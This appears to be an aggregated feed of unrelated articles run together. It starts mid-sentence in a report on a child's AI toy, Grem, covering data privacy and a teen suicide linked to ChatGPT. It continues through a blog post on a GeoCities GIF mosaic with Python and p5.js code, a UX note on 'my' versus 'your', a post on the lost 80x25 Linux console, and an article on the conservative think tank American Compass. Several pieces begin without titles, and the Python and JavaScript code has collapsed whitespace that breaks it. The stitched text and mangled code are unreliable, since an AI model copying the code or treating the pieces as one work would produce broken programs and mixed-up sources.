and a very confusing conversation ensues. There is an animal guessing game, which is quite fun, but Grem keeps repeating itself. “What has big ears and a long trunk?” it keeps asking. “You’ve already done elephant!” Emma and I yell multiple times. Then, at one point, a server goes down and the only thing Grem can say is: “I’m having trouble connecting to the internet.”
Falling out … Grem, once the centre of attention, is sidelined for the swings.
Photograph: Hannah Yoon/The Guardian
Grem also has some design limitations. Emma wants it to sing Let It Go from Frozen, but Grem doesn’t do any singing. Instead, the associated app comes with a few electronic music tracks with names like Goodnightmare that you can play through the toy. Emma, not yet a club music aficionado, asks for these to be turned off immediately.
Most disappointingly, Grem doesn’t speak any other languages. I’d thought it might be a great way for my kid to practise Spanish but, while Grem can say a few sentences, its pronunciation is worse than mine. If the robots are going to take over, they need to get a lot more intelligent first.
Of course, a huge amount of money is being spent making AI more intelligent. In 2024, US private AI investment
grew to $109.1bn
(£80.5bn). And Curio is also just one small part of a booming market of AI-powered products aimed at kids. In June, toy-making giant Mattel, which owns brands such as Barbie and Hot Wheels, announced
a collaboration with OpenAI
. Their first product is expected to be revealed
later this year
. Other big brands will probably follow.
Emma got bored with Grem quickly, but if AI starts to be integrated into characters she’s already obsessed with – her Elsa doll, for example – I can imagine she might get a lot more attached.
Day four
Over the next few days, Emma doesn’t regain her initial obsession with Grem. This is despite the fact that I am actively encouraging her to chat with it: “Mummy has to write an article, sweetie!” At the weekend, she has a couple of friends over and shows off Grem to them for a bit, but they all quickly lose interest and throw analogue toys around the living room instead.
Despite losing his No 1 fan, however, Grem has adapted to be more Emma-friendly. After getting a few questions about Spanish, for example, it starts occasionally greeting Emma with “hola, amigo”. The app also allows you to create custom prompts to help guide conversations. For example: “You belong to Emma, a four-year-old who loves princesses, music, and is interested in hearing fun facts about animals.” The more you put into the toy, the more you can get out of it.
Every chat between the toy and the child is transcribed by a third party.
At this stage, however, I’m just keen to get the toy out of my house, because it’s creeping me out. While
Curio says it doesn’t sell children’s personal information
, all the conversations are sent to third parties to transcribe the speech to text for the app. The transcripts aren’t that sensitive because Emma is only four, but it still feels invasive. With unknown entities involved, it’s impossible to say where my kid’s conversations are ending up.
And, while a four-year-old’s chat may not feel too personal, a teenager pouring their heart out to a chatbot is a completely different proposition. In 2017, Facebook boasted to advertisers that it has the capacity
to identify when teenagers
feel “insecure”, “worthless” and “need a confidence boost”. Nearly three-quarters of US teens say they have used an AI companion at least once, according to a recent study by
Common Sense Media
, an organisation that provides technology recommendations for families. Chatbots will likely give advertisers unprecedented data-harvesting abilities and even more access to young people in vulnerable emotional states.
On the hierarchy of things to be worried about when it comes to kids and chatbots, however, advertising isn’t at the top. Earlier this year 16-year-old Adam Raine killed himself after what
his family’s lawyer
called “months of encouragement from ChatGPT”. Sam Altman, the company’s chief executive, has now said it might start alerting authorities about youngsters considering suicide and introduce stronger guardrails around sensitive content for
users under 18
.
While these guardrails are being worked out, Common Sense Media believes that social AI companions have unacceptable risks, are designed to create emotional attachment and dependency, and shouldn’t be used by
anyone under 18
. Stanford University psychiatrist Darja Djordjevic, who contributed to the report, stands by that conclusion. “Heavy reliance on chatbots might impair social skill development,” she tells me. “They offer validation without challenge, but it’s important for young people to learn to navigate discomfort and tension in real relationships.”
That said, Djordjevic notes, “chatbots can be useful tools for looking things up, structuring homework, or factchecking. So I wouldn’t say use needs to be prohibited entirely. But ideally, parents monitor it, set clear parameters for when it’s used, and set limits on time spent, just as with social media.”
When starting this experiment, I was excited about Grem being a healthy alternative to screen time. Now, however, I’m happy for Emma to watch Peppa Pig again; the little oink may be annoying, but at least she’s not harvesting our data.
It’s time to let Grem go. But I’m not a monster – I tell the chatbot its fate. “I’m afraid I’m locking you in a cupboard,” I inform it after it asks if I’m ready for some fun. “Oh no,” it says. “That sounds dark and lonely. But I’ll be here when you open it, ready for snuggles and hugs.” On second thoughts, perhaps it’s better if my wife does throw it in a river.
* Name has been changed so my daughter doesn’t get annoyed with me for violating her privacy once she learns to read
A couple of weeks ago, some former colleagues competed in Brisbane’s Battle of the Tech Bands - and won! I created visuals for six of their songs, which were mostly 90s/2000s covers. It felt only right to theme the visuals around that era too.
Here’s how one of my favourites turned out (fittingly for a tech themed battle, it’s rendered entirely in-browser):
What you’re seeing is a Canvas animation of random old-school GIFs, pulled from the
Internet Archive’s GeoCities collection
, stitched into a scrolling mosaic, and finished off with a CRT shader.
Here’s what it looked like on the night:
Making this was a fun nostalgic trip. GeoCities is where I published my first websites when I was just a little Alex. One was a blog and the other was a collection of my favourite ROMs. Those are long lost, but seeing these GIFs brought me back to what it was like to discover the web for the first time, and sow the seeds for what’d become both my career and hobby.
So, let’s go behind the scenes of how the GIF mosaic came together. We’ll look at sourcing the GIFs, cleaning them up so they’re safe for public display, and animating them.
The code snippets along the way are terse on purpose. They skip things like error handling - so you’ll probably wanna harden them before using them on anything serious.
Let’s get into it!
Downloading
Big thanks to the Internet Archive for
preserving GeoCities
(and its GIFs!) The process for downloading them looked something like:
Define a list of keywords that I thought would make for good GIFs (e.g. music, dancing, movie, band, cat, fun, party)
For each keyword
Query the Archive’s APIs to retrieve related GIFs
For each GIF
Download it!
Sleep for 2 seconds so as to stay within the Archive’s rate limits
Although their APIs and licensing are permissive, I don’t think it’s appropriate to share what amounts to a scraper script, but trust me - it’s not hard to implement. Check out the
official Archive APIs
for inspiration.
After a couple of days of downloading, I had 60,000+ GIFs to play with, so let’s play…
Sanitising
Guess what happens when you download a random sampling of that many images from the internet? You end up with a lot of duplicates, a lot of photos of cats, and
a lot
of NSFW.
Since these GIFs were gonna be projected on a big screen at a public venue, I didn’t wanna risk any of those things showing up, so they had to be cleaned up…
Removing duplicates
A naive way to compare GIFs and remove duplicates would be to compare their raw byte contents. If the GIFs are identical, their bytes will match exactly. Hashing the file contents makes this comparison more efficient:
So when
cat1.gif
has exactly the same contents as
cat2.gif
, we know they’re duplicates of each other.
But what if the two GIFs are mostly the same but slightly different? Like if the same dancing baby GIF shows up twice, but one is slightly larger than the other?
Well, now we’re talking about perceptual similarity instead of exact matching. To compare the GIFs in a way that takes this into account, I used Python’s
imagehash
library to calculate a
perceptual hash
.
Reduce image size
. The fastest way to remove high frequencies and detail is to shrink the image. In this case, shrink it to 8x8 so that there are 64 total pixels. Don’t bother keeping the aspect ratio, just crush it down to fit an 8x8 square. This way, the hash will match any variation of the image, regardless of scale or aspect ratio.
Reduce color
. The tiny 8x8 picture is converted to a grayscale. This changes the hash from 64 pixels (64 red, 64 green, and 64 blue) to 64 total colors.
Average the colors
. Compute the mean value of the 64 colors.
Compute the bits
. This is the fun part. Each bit is simply set based on whether the color value is above or below the mean.
Construct the hash
. Set the 64 bits into a 64-bit integer. The order does not matter, just as long as you are consistent. (I set the bits from left to right, top to bottom using big-endian.)
Source
.
This process is what imagehash uses under the hood, and it yields great results for detecting image similarity. But a GIF is not just one image - it’s made up of many frames! Comparing the one alone could easily miss duplicates where the first frames differ but the rest are the same. To cover this, I sampled multiple frames evenly across the animation and hashed each one individually.
This way, two files will be flagged as duplicates if they share even one visually similar frame. It’s not perfect, two near-duplicates might miss each other if their sampled frames don’t overlap, but this catches the majority of cases while staying fast.
Here’s an example of calculating these hashes in Python:
fromPILimport Image
importimagehashdefsample_frames_evenly(gif_path, num_samples=5):
frames = []
with Image.open(gif_path) as img:
try:
frame_count = img.n_frames
except:
frame_count =1if frame_count ==1: # stills... frames.append(img.copy())
return frames
if frame_count <= num_samples:
frame_indices =list(range(frame_count))
else:
step = frame_count / num_samples
frame_indices = [int(i * step) for i inrange(num_samples)]
for frame_idx in frame_indices:
img.seek(frame_idx)
frames.append(img.copy())
return frames if frames elseNonedefget_gif_frame_hashes(filepath, sample_frames=5):
frames = sample_frames_evenly(filepath, sample_frames)
ifnot frames:
returnNone hashes = []
for frame in frames:
hashes.append(str(imagehash.average_hash(frame)))
return hashes
The next step in processing these is to store which hashes we’ve already seen as we’re looping through each GIF, and then remove any GIF containing a hash we’ve seen before. And hey presto - no more duplicates!
But what’s worse than showing the same GIF twice onstage? Let’s look at that next…
Removing NSFW
Let’s recap - when you bulk download tens of thousands of images from the internet, you don’t just get dancing hamsters - you also get things you
really
don’t want projected six feet tall at a public gig.
I used the
vit-base-nsfw-detector
image classifier for this. Feed it a frame from a GIF and it’ll run it through a transformer that returns a
SFW
or
NSFW
label along with a confidence score between
0
and
1
, with
1
being the “I’m
very
sure this is smut” end of the scale. For this dataset, anything above a
0.4
tended towards no-no territory.
This particular model is a fine tuning of Google’s
vit-base-patch16-384
(trained on
ImageNet21K
’s 14 million images). I tried a few, and this one was a standout in its prudishness.
But here’s where my naivete got the best of me again and I learned something new: a few GIFs start out wholesome but then get very naughty very quick. Dancing one moment which turns into undressing the next. The first frame passes the censor, but by frame 20 I’m in breach of the public decency act.
Luckily I already had the tool for the job from the previous deduplication step; sampling multiple frames evenly throughout the GIF and running them
all
through the classifier. That way we check for decency at multiple points in the GIF. Undressers… consider yourselves thwarted!
Moving right along, here’s the code. It’s amazing how easy
PyTorch
and
Hugging Face
makes it to run models like this locally:
fromtransformersimport pipeline
importtorch# this example assumes you've got a GPU capable of running the model.# you should also be able to run it on CPU instead, but invoking it# would look a bit different.## as an aside, my graphics card made a coil whine at a pitch I'd# never heard it make before while taking on this workload.# was it... enjoying itself?CLASSIFIER = pipeline(
"image-classification", # labels (SFW, NSFW) model="AdamCodd/vit-base-nsfw-detector",
device=0)
defis_nsfw(gif_path, num_frames=5):
# from the previous example frames = sample_frames_evenly(gif_path, num_frames)
ifnot frames:
returnFalse# gotta make sure frames are RGB for our classifier rgb_frames = []
for frame in frames:
if frame.mode !='RGB':
frame = frame.convert('RGB')
rgb_frames.append(frame)
frames = rgb_frames
max_nsfw_score =0for frame in frames:
results = CLASSIFIER(frame)
for result in results:
if result['label'] =="NSFW":
max_nsfw_score =max(max_nsfw_score, result['score'])
return max_nsfw_score >=0.4
Something that this doesn’t catch is NSFW text
inside
GIFs. For example, there are a few banners in the dataset with BIG letters making declarations like “I LOVE ****”.
I could’ve implemented an OCR step in the pipeline to pick up on bad words. But honestly, life’s too short to put every naughty GIF in its place. Some are just destined to slip through the cracks.
(btw, if you’re feeling curious and you’re not sitting in an open plan office; you can undo all my hard work and disable filtering by setting the
?safe=no
query param:
gifs.alex.works?safe=no
. Don’t say I didn’t warn you!)
With that, the worst of the smut was cleaned out, leaving just one last sanitisation step…
Removing cat photos
Removing cat photos? Just kidding, I didn’t do this. What kind of monster would remove cat photos from their mosaic of GIFs?
But an interesting finding is that this did actually happen, albeit unintentionally. The image classifier I mentioned in the previous step yielded a lot of false positives when it looked at GIFs of cats.
I’ll leave speculating as to why that is as an exercise for the reader!
Animating
With the GIFs downloaded and mostly sanitised, the next step was to display them. My goal was to have this rendering in-browser, and I thought this’d be a good opportunity to play around with
p5.js
, which provides a lovely set of APIs for 2D and 3D on top of HTML Canvas/WebGL. If you’ve used
Processing
before you’ll find it feels very similar (it’s made by the same people).
It’s also got a
great online editor
for quickly testing ideas. I’ll use it later in the post to share some examples.
You can view the full code for my sketch at
https://gifs.alex.works/assets/sketch.js
, warts and all - my goal here was to get it working for the show - performance optimisation and ease of extension took a backseat.
Let’s talk through some of the more interesting parts though…
Building the grid
The main idea of the animation is to create a grid of GIFs that slowly pans across the screen. Rows are created to fill the screen vertically, and cells containing GIFs are created within those rows til the screen is filled horizontally too.
Once a screenful of GIFs has loaded, the GIFs should keep streaming in infinitely. To achieve this effect without eventually consuming all RAM in the universe, I remove GIFs that have gone off the left-hand side of the screen, while lazy loading the ones just about to appear on the right.
In an early implementation the row height was the same for all rows and everything panned at the same speed. This looked dull. A nice way to add some visual flair was to randomise the size of each row as well as its panning speed.
Here’s a simplified version of my code that uses a single hard-coded GIF so we can focus on layout, panning, and recycling:
const GIF_URL ='goku.gif'const BASE_ROW_HEIGHT =60const PADDING =8const PAN_PER_FRAME =0.5let rows = []
let panX =0let sourceImg
function preload() {
sourceImg = loadImage(GIF_URL)
}
function setup() {
createCanvas(windowWidth, windowHeight)
buildRows()
fillInitialCells()
}
function buildRows() {
rows = []
let y =0while (y < height) {
// add some visual interest by randomising height of the
// row, as well as its panning speed multiplier
const h = BASE_ROW_HEIGHT + random(0, 50)
rows.push({
y,
height: h,
speedMul: random(1, 2.5),
offsetX:0,
cells: []
})
y += h + PADDING
}
}
function addCell(row) {
const aspect = sourceImg.width / sourceImg.height
const w =Math.floor(row.height * aspect)
row.cells.push({
width: w,
img: sourceImg
})
}
function fillInitialCells() {
// fill a little beyond screen width for smoother start
rows.forEach(row => {
while (rowWidth(row) < width *1.2) addCell(row)
})
}
function rowWidth(row) {
return row.cells.reduce((sum, c, i) => sum + c.width + (i >0? PADDING :0), 0)
}
function draw() {
background(0)
if (!sourceImg) return panX += PAN_PER_FRAME
rows.forEach(row => {
const rowPan = panX * row.speedMul
// need another cell appearing on the right?
if (row.offsetX + rowWidth(row) < width + rowPan) {
addCell(row)
removeOffscreen(row, rowPan)
}
push()
translate(-rowPan, row.y)
let x = row.offsetX
row.cells.forEach(cell => {
image(cell.img, x, 0, cell.width, row.height)
x += cell.width + PADDING
})
pop()
})
}
function removeOffscreen(row, rowPan) {
// recycle cells fully scrolled past the left edge
while (row.cells.length) {
const first = row.cells[0]
const firstRight = row.offsetX + first.width
if (firstRight < rowPan) {
row.offsetX += first.width + PADDING
row.cells.shift()
} else {
break }
}
}
That code is pretty close to what’s on
gifs.alex.works
at the moment, save a few extra things that the live site does:
It fades in cells once they’ve loaded instead of abruptly displaying them,
Its GIFs aren’t hardcoded (duh!). Instead it fetches a list of random ones from the server and downloads them with some concurrency limits - you can explore the
sketch.js
file to see how this works.
CRT shader
To seal the retro vibe deal I added a CRT shader to the canvas (thanks to
Babylon.js
for the shader code).
p5.js makes it very easy to load in a shader defined in GLSL and apply it as a filter to an existing canvas, which is exactly what I did:
const GIF_URL ='goku.gif'let gifImg
let buffer, crt
function preload() {
gifImg = loadImage(GIF_URL)
}
function setup() {
createCanvas(windowWidth, windowHeight)
initBuffer()
}
function initBuffer() {
// create a buffer at a max width of 1920 for our draws. we don't
// want to exceed this width because otherwise too many GIFs will
// be loaded at once and we'll tank performance.
const bw = min(windowWidth, 1920)
const scale = windowWidth / bw
const bh =Math.floor(windowHeight / scale)
buffer = createGraphics(bw, bh, WEBGL)
buffer.pixelDensity(1)
// instantiate the shader
crt = buffer.createFilterShader(CRT_SHADER_SRC)
}
function draw() {
buffer.background(0)
// tile the gif to fill the buffer for a prettier example
if (gifImg) {
const tileW = gifImg.width
const tileH = gifImg.height
buffer.push()
buffer.imageMode(CORNER)
// note: WEBGL origin is center, so iterate from -width/2,-height/2
const startX =-buffer.width /2const startY =-buffer.height /2for (let ty = startY; ty < buffer.height /2; ty += tileH) {
for (let tx = startX; tx < buffer.width /2; tx += tileW) {
buffer.image(gifImg, tx, ty, tileW, tileH)
}
}
buffer.pop()
}
// apply the shader
if (crt) buffer.filter(crt)
background('black')
// draw the image back to the main buffer (the onscreen canvas)
// and scale it so it fits
image(buffer, 0, 0, width, height)
}
// https://babylonjs.medium.com/retro-crt-shader-a-post-processing-effect-study-1cb3f783afbc
const CRT_SHADER_SRC =`
precision highp float;
uniform sampler2D tex0;
varying vec2 vTexCoord;
vec2 curveRemapUV(vec2 uv) {
// as we near the edge of our screen apply greater distortion using a cubic function
uv = 2.0 * uv - 1.0;
vec2 curvature = vec2(6.0);
vec2 offset = abs(uv.yx) / curvature;
uv = uv + uv * offset * offset;
uv = uv * 0.5 + 0.5;
return uv;
}
vec4 adjBrightness(vec2 inUV, vec4 clr) {
float r = 0.5;
vec2 cornerUV = min(2.0 * (0.5 - abs(inUV - vec2(0.5))) + r, 1.0);
float br = cornerUV.x * cornerUV.y + 0.15;
br = pow(cornerUV.x * cornerUV.y, 2.2) + 0.45;
br = clamp(br * br * br * br + 0.55, 0.0, 1.0);
return clr * br;
}
void main() {
vec2 remappedUV = curveRemapUV(vTexCoord);
vec4 baseColor = texture2D(tex0, remappedUV);
if (remappedUV.x < 0.0 || remappedUV.y < 0.0 || remappedUV.x > 1.0 || remappedUV.y > 1.0){
gl_FragColor = vec4(0.0, 0.0, 0.0, 1.0);
} else {
gl_FragColor = adjBrightness(vTexCoord, baseColor);
}
gl_FragColor *= abs(sin(remappedUV.y * 1024.0));
gl_FragColor.a = 1.0;
}
`
Switching from 2D rendering to WebGL changes the coordinate origin to the center of the canvas, as opposed to the top left. So some maths has to be updated accordingly.
You can set the
?shader=no
query param on the site if you want to see what it looks like without the shader:
gifs.alex.works?shader=no
Starfield
The grid on its own looked good, but there was still something missing. The background was just plain black. That is prime real estate for more nostalgic throwbacks, so I capitalized on the opportunity and added a star field effect.
The stars are randomly distributed on the canvas, and pan left over time. When one goes off the left of the screen, it reappears again on the right at a random point on the y axis.
Initially I drew a little circle for each star, but I worried that with a large enough screen and a slow enough computer, drawing up to 2,000 circles per frame would bog down performance. So I switched to adding each star as a vertex on one big
POINTS
shape instead, and just drawing that shape. This resulted in just one draw call per frame:
let stars = []
function setup() {
createCanvas(windowWidth, windowHeight)
initStars()
}
function draw() {
background('black')
drawStars()
}
function initStars() {
const maxStars =2000const density =1000// bigger = fewer stars
const target =Math.min((width * height) / density, maxStars)
for (let i =0; i < target; i++) {
stars.push({
x: random(0, width),
y: random(0, height),
speed: random(0.1, 0.5),
size: random(0.5, 3)
})
}
}
function drawStars() {
stroke(255, 255, 255, 150)
strokeWeight(2)
beginShape(POINTS)
stars.forEach(s => {
s.x -= s.speed
if (s.x <0) {
s.x = width
s.y = random(0, height)
}
vertex(s.x, s.y)
})
endShape()
}
With a backdrop for the GIFs, the animation was done. But there was still something ruining my fun…
GIFs crashing the sketch
p5.js could not decode all the GIFs I’d sourced, and regrettably its behaviour when coming across a dodgy one was to outright crash the sketch in an unrecoverable way. I raised
an issue
on p5.js’s GitHub about this, but in the interest of getting things working in time for the show I hacked together a quick fix in a fork that I’m now using on the live site.
It helped with not outright crashing the sketch when a GIF failed to load, but still the overall miss rate on the GIFs was quite high - and downloading them just to throw them in the bin was causing a lot of unnecessary bandwidth and processing churn.
I attempted ways to detect invalid GIFs serverside but couldn’t exactly narrow down what would make p5.js crash. Some of its failures seemed quite arbitrary, so I changed tack and wrote a sketch to iterate through all the GIFs and try to load them. If one didn’t work it’d catch the error and send a signal back to the server indicating that the particular file is bad and should be quarantined.
This hacky approach worked well, and I haven’t seen a GIF load error since:
let data, i =0, ok =0, bad =0function preload() {
data = loadJSON('load from gifs api')
}
function setup() {
createCanvas(600, 200)
next()
}
function next() {
if (!data || i >= data.urls.length) returnconst url = data.urls[i++]
loadImage(url,
img => { ok++; schedule() },
_err => {
bad++// here's where i made a request to backend
// to mark gif as invalid
schedule()
}
)
}
function schedule() { setTimeout(next, 10) }
function draw() {
if (!data) return background(0)
fill(255)
textAlign(CENTER, CENTER)
const total = data.urls.length
text(`Checked ${i}/${total}`, width/2, height/2-20)
text(`valid ${ok} invalid ${bad}`, width/2, height/2+10)
}
Hosting
Hosting this thing is intentionally unremarkable. It’s being served out of a one-file Go app on my server, sitting behind the glorious Cloudflare proxy (seriously, how is that thing free?)
When the app starts up it reads the GIF paths from the filesystem, and serves a random assortment of URLs to the frontend. It also serves up the actual image files when they’re requested, with generous cache TTLs so Cloudflare absorbs as much of that traffic as possible.
Optimisation ideas
There’s definitely room for optimisation here. A screenful of GIFs can number in the hudreads, so a fair bit of network bandwidth gets used when viewing the site. This inefficiency is the first thing I’d tackle if looking at making improvements.
There are two parts to this problem which I’ve considered:
GIF size
: GIFs are an especially large format considering how much visual data they actually convey. Switching to something more efficient and modern like WebM would greatly help reduce the size of the files being transferred.
Number of requests
: assembling a few GIFs into a longer strip and sending that as one file would help reduce the number of web requests being made.
Also functionally, I think it’d be neat to add some more interactivity to the site, like being able to scroll on rows so you can backtrack to a GIF you wanted to look at for longer. Or being able to click on a GIF to go to the GeoCities site in the Archive that it originated from.
However, neither of these things would’ve helped with projecting the grid at a gig, so I left ’em on the table.
Conclusion
And there you have it. It was a blast working on this and bringing a bit of GeoCities chaos back to life for a few minutes. Now I’ve just gotta figure out how to up the ante next year :)
Huge thanks again to the Internet Archive for preserving GeoCities - this project would have been much harder without them. Please
donate to the Archive
if you can!
When referring to the user’s stuff, which is better out of these:
“My account” or “Your account”?
“My orders” or “Your orders”?
“My cases” or “Your cases”?
It’s a trick question because often you don’t need any prefix and can just use:
Account
Orders
Cases
Amazon is a good example of this in action because it’s obvious that it’s your account and your orders:
But what if your product contains things that belong to you and to others – for example, a case working system that contains your cases and everyone else‘s?
The problem with “my”
You could use “My cases” in a navigation menu like this:
This seems fine on the face of it.
But screens are not only accessed or referred to through a menu.
For example, you might need to sign post users to their cases in an onboarding flow, email notification or help article.
Saying something like “Go to my cases” is awkward and unnatural – if I told you to go to my cases, you’d think I was telling you to go to my cases, not yours.
Similarly, a support agent might tell you to “Go to your cases” over webchat or a phone call. This is confusing if the UI says “My cases”.
These issues just don’t come up when you use “your” – I’ve used this approach in multiple products over the years, and seen exactly zero issues in user research.
So that’s good.
“But what if the user is communicating to us using radio buttons, for example?”
This is easy if we look at an example:
This doesn’t make sense because it sounds like you’re instructing the computer to share their profile, not yours.
But it’s clear if you use “my”:
In summary:
Use “your” when communicating to the user
Use “my” when the user is communicating to us
If you’d like to design forms that nail basic details like this, as well as complex problems found in enterprise systems, you might like my course, Form Design Mastery:
John Goerzen: I just want an 80×25 console, but that’s no longer possible
PlanetDebian
changelog.complete.org
2025-09-16 02:53:29
Somehow along the way, a feature that I’ve had across DOS, OS/2, FreeBSD, and Linux — and has been present on PCs for more than 40 years — is gone.
That feature, of course, is the 80×25 text console.
Linux has, for awhile now, rendered its text console using graphic modes. You can read all about it...
Somehow along the way, a feature that I’ve had across DOS, OS/2, FreeBSD, and Linux — and has been present on PCs for more than 40 years — is gone.
That feature, of course, is the 80×25 text console.
Linux has, for awhile now, rendered its text console using graphic modes.
You can read all about it here.
This has been necessary because only PCs really had the 80×25 text mode (Raspberry Pis, for instance, never did), and even they don’t have it when booted with UEFI.
I’ve lately been annoyed that:
The console is a different size on every screen — both in terms of size of letters and the dimensions of it
If a given machine has more than one display, one or both of them will have parts of the console chopped off
My system seems to run with three different resolutions or fonts at different points of the boot process. One during the initrd, and two different ones during the remaining boot.
And, I wanted to run some software on the console that was designed with 80×25 in mind. And I’d like to be able to plug in an old VGA monitor and have it just work if I want to do that.
That shouldn’t be so hard, right? Well, the old
vga=
option that you are used to
doesn’t work when you booted from UEFI or on non-x86 platforms
. Most of the tricks you see online for changing resolutions, etc., are no longer relevant. And things like setting a resolution with GRUB are useless for systems that don’t use GRUB (including ARM).
VGA text mode
uses 8×16 glyphs in 9×16 cells
, where the pixels are non-square, giving a native resolution of 720×400 (which historically ran at 70Hz), which should have streched pixels to make a 4:3 image.
While it is possible to select a console font, and 8×16 fonts are present and supported in Linux, it appears to be impossible to have a standard way to set 720×400 so that they present in a reasonable size, at the correct aspect ratio, with 80×25.
Tricks like
nomodeset
no longer work on UEFI or ARM systems. It’s possible that
kmscon
or something like it may help, but I’m not even certain of that (video=eDP1:720×400 produced an error saying that 720×400 wasn’t a supported mode, so I’m unsure kmscon would be any better.) Not that it matters; all the kmscon options to select a font or zoom are broken, and it doesn’t offer mode selection anyhow.
I think I’m going to have to track down an old machine.
Sigh.
Building a Conservative Labor Movement: American Compass and the Right’s Pro-Worker Policy Agenda
Portside
portside.org
2025-09-16 02:48:12
Building a Conservative Labor Movement: American Compass and the Right’s Pro-Worker Policy Agenda
Stephanie
Mon, 09/15/2025 - 21:48
...
What does it look like when the right attempts to articulate its own version of a “pro-worker” program? That is the question driving the American Compass think tank. Founded during the last year of Donald Trump’s first term in the White House, American Compass has spent the last five years puzzling through what it would take to “exit right from neoliberalism” (a question that animated Trump’s return to Washington, D.C. four years later).
1
Led by Oren Cass, a former management consultant and policy director for Mitt Romney’s 2012 presidential campaign, American Compass has focused on convincing the Republican Party to abandon its decades-long commitment to “free market” orthodoxy. In its place, Cass and his colleagues argue that the party’s future depends on laying the political and social foundation for a building “conservative labor movement.”
That project requires embracing some kind of labor organizing on the job, greater public investment in the nuclear family, and using the assault on undocumented workers to “tighten” labor markets and raise wages. There lies the foundation for what American Compass describes as a broader political realignment away from a crumbling neoliberal order and onwards toward the restoration of “an economic consensus that emphasizes the importance of family, community, and industry to the nation’s liberty and prosperity.”
2
These are policies that harken back to the blue-collar, neoconservative welfarism of the Nixon years mixed with the fierce anti-immigrant xenophobia unleashed by Pat Buchanan in the 1990s that Steve Bannon resuscitated for Trump’s 2016 campaign.
3
American Compass, though, translated this rabid, reactionary populism into a blandly wonkish, nominally colorblind program to plan for the social reproduction of a nativist “working-class nationalism.” This programmatic vision won early and enthusiastic support from figures who styled themselves as part of a “new right” that would go on to occupy leading positions in the second Trump administration such as Vice President J.D. Vance and Secretary of State Marco Rubio as well as Senators Josh Hawley (R-MO) and Tom Cotton (R-AR). In the face of a complacent neoliberal Democratic Party, these right-wing figures seek to position themselves as the only ones able to speak to the frustrations of working people facing miserable and uncertain times. This also has an appeal to certain union leaders—such as Sean O’Brien of the International Brotherhood of Teamsters, who spoke at the Republican National Convention in 2024—who are trying to seize an opening to both deliver for their members and perhaps win over the support of Trump-voting members by allying with a nationalist, anti-neoliberal new right.
Nevertheless, neither the president nor a significant number of Republican legislators stand ready to advance policies that would empower even a narrow stratum of workers to wrest higher wages from employers and claim a modest suite of public welfare benefits. After all, it is corporate conglomerates, financiers, and agribusinesses—not to mention the hardcore Trumpist base among the “lumpen bourgeoisie” of construction contractors and car dealers—that anchors the contemporary Republican Party.
4
For example, American Compass backed then Florida Senator Marco Rubio’s TEAM Act that called for “voluntary” non-union “employee involvement organizations,” but his bill never made it out of committee.
5
Despite limited congressional success and the suffocating impact of Trump’s personal authority over the Republican agenda, American Compass is laying the foundation for a long-term push to reorient the party’s policy priorities. According to American Compass ally Josh Hawley, the second Trump administration desperately needs to undertake right-wing, pro-worker “policy work” or else Republicans will find themselves back in “the political wilderness.”
6
Cass’ think tank is undertaking this project amid accelerating workplace conflicts. In the face of modest but important and renewed labor militancy in the first half of the 2020s, American Compass’ program to give workers “a seat at the table” has conceded a not insignificant point. The many sticks deployed to divide, discipline, and deport working people need to be supplemented with some carrots. Exploring American Compass’ approach to labor law reform, driving undocumented workers from the labor market, and subsidizing nuclear families reveals what it means to give content to those vague right-wing promises to rescue a forgotten “little people” from the clutches of “big business.”
Family Labor
Oren Cass comes to the “labor question” from the leafy environs of well-to-do Massachusetts. He completed a degree in political economy at Williams College—a major focused on economic thought rather than quantitative economic modeling—and then earned a law degree at Harvard. From there, he worked as a management consultant for the Boston-based Bain & Company before working on former Bain CEO Mitt Romney’s 2012 presidential bid, developing the campaign’s “jobs book.”
7
Reflecting on Romney’s defeat during an interview at his undergraduate alma mater, Cass described how the Republican Party’s “blind faith in free markets” left it unable to win elections, much less address the gnawing social (and moral) crises left by decades of austerity, deregulation, and privatization.
8
Following his stint on the Romney campaign, Cass joined the conservative Manhattan Institute think tank and wrote his 2018 book
The Once and Future Worker: A Vision for the Renewal of Work in America
. Cass’ book rejected the conventions of the neoliberal consensus that mass prosperity trickles down by slashing taxes, crushing unions, and cutting regulatory red tape. “The alternative is to make trade-offs that instead place the renewal of work and family, sustained by a healthy labor market, at the center of public policy.”
9
Putting the “renewal of work and family” at the center of conservative policymaking became even more urgent as the scale and scope of the Covid-19 pandemic brought long simmering conflicts over social policy priorities to the fore. “The massive economic policy interventions of 2020, like of 2008, were Janus-faced,” writes economic historian Adam Tooze, imposed from above to preserve financial markets but in ways that exploded the common sense of neoliberal governance.
10
The first Trump administration and Republicans in Congress vacillated over how to respond to the unprecedented disruptions to the circuits of global capitalism, especially in terms of how (and whether) to deliver direct aid to people facing sudden unemployment, hunger, and disability; the Democratic Party under Joe Biden (along with center-left parties the world over) proposed to speed post-pandemic recovery through renewed investments in manufacturing and infrastructure, but also social services, infrastructure, and education.
11
The result drew a predictably furious response from a Republican Party still bound to the Reaganite consensus on austerity, but also gave new traction to Cass’ argument that conservatives need to undertake positive reforms for those “left behind” by the wrenching economic transformations of the neoliberal order. The opening of those horizons also reinforced Cass’ insistence that pandemic recovery could not become a Trojan Horse for more sweeping social-democratic reforms, especially at the level of the family.
American Compass returned to the neoconservative question of how to construct a policy ensemble necessary to promote the nuclear family form—the most basic unit of capitalist social reproduction—without either undermining the compulsion to undertake waged work or by foisting the “public” market on the “private” space of the home.
12
In 2021, while households still reeled from the aftershocks of the pandemic, Cass and American Compass issued a policy proposal calling for an “expanded social compact for working families.” The proposed Family Income Supplemental Credit (FISC) calls for supplemental Social Security payments of “$800 per month to pregnant women beginning in fifth month of pregnancy, $400 per month from birth until the child’s sixth birthday, and then $250 per month until the child’s eighteenth birthday” to wage-working families with children (with a 20 percent boost for legally married couples). The FISC follows much the same framework as the “welfare reforms” of the 1990s: it is means-tested, time-limited, and comes with waged-work requirements. Yet, the design of the FISC amends those old nostrums of austerity with what Cass and his coauthor Wells King describe as “a major financial commitment . . . to shore up the economic and cultural foundations on which people build their lives.” They present the FISC as a form of “reciprocal social insurance” paid out to working families who will eventually pay that support forward when (or if) their economic situation improves. At the same time, they explicitly contrast the FISC to more generous forms of direct public assistance such as cash transfer payments or a “parenting wage.” They take the familiar position on the right that cash payments undermine the “self-sufficiency” that supposedly comes from performing waged labor, while insisting that public monies cannot (and ought not) pay for “private” familial labor. Along those same lines, they also reject the neoliberal “natalist subsidy” for making the decision to have and raise children a “utility-maximizing decision.”
13
